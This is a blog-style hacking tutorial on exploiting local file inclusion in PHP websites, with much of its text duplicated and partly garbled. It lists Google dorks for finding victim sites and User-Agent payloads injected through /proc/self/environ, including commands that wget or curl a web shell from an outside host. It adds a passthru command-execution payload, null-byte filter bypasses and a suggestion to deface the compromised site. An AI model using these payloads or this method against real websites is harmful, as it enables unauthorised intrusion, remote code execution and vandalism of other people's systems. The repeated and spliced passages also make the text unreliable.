Website Hacking by LFI
11:13 am
LFI AND SHELL UPLOAD WITH TAMPER DATA
LFI vulnerable website URL looks like this:
Code:
www.website.com/index.php?page=/etc/passwd
Here's what the code looks like that makes it vulnerable.
1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]
or use these dorks for finding vulnrable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=
Now i'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper data
So after selecting a vulnerable website, check /etc/passwd.
Great !!, now you are sure that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ
i'm interested in, HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.
To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.
your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.
i'll try some code injection.
In the User-Agent field, type this
<?php phpinfo();?>
Now vulnrable website is down loading,
Now we can execute code, so let's upload upload your shell
Open TamperData again, click start tamper, and refresh website. and This time in the User-Agent enter this
<?exec('wget http://www.site.com/shell.txt -O shell.php');?>
it downloads text file, and renames it as a php file
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting
when you're done with that, you can access your shell directly by going to http://site/shell.php
If you getting an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php
If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done,
Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.
Change your user agent to:
<? passthru($_GET['cmd']); ?>
Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php
Now hopefully your shell uploaded.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
Code:
www.website.com/index.php?page=/etc/passwd
Here's what the code looks like that makes it vulnerable.
<?phpFew Things You Need for this Method
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=
Now i'm showing how to exploit LFI and upload your shell via /proc/self/environ using Tamper data
So after selecting a vulnerable website, check /etc/passwd.
Great !!, now you are sure that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ
i'm interested in, HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.
To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.
your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.
i'll try some code injection.
In the User-Agent field, type this
Now we can execute code, so let's upload upload your shell
Open TamperData again, click start tamper, and refresh website. and This time in the User-Agent enter this
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting
when you're done with that, you can access your shell directly by going to http://site/shell.php
If you getting an error, try using the same method as when you got your
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php
If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done,
Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.
Change your user agent to:
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curl http://www.yoursite.com/shell.txt -o shell.php
Now hopefully your shell uploaded.
Null Bytes
Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
Written by Admin
Chennai hackers connect is a branch of Computer maniac.It is the platform for the HACKERS to connect and start exploiting.
code simply rocks and very very simple.
ReplyDelete